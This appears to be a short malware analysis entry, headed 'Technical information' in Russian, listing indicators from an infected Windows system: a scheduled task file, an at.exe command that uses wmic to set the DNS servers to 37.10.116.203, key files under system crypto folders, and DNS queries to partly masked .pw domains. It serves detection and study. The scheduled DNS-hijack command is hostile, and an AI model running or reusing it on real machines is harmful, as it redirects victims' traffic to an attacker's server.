Техническая информация
- %WINDIR%\Tasks\At1.job
- '<SYSTEM32>\PING.EXE' -n 10 localhost
- '<SYSTEM32>\at.exe' 19:56:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
- <SYSTEM32>\Tasks\At1
- C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\d42cc0c3858a58db2db37658219e6400_fdaad129-04df-4089-bb80-174ce725f721
- <SYSTEM32>\Microsoft\Protect\S-1-5-18\User\d723a3fb-beec-49f0-88be-6aaa1e3760de
- 'ca###st33.pw':36
- 'ca##est3.pw':36
- 'vo##dex.pw':36
- 'bo##kes.pw':36
- DNS ASK ca###st33.pw
- DNS ASK ca##est3.pw
- DNS ASK bo##kes.pw
- DNS ASK vo##dex.pw
- DNS ASK dn#.##ftncsi.com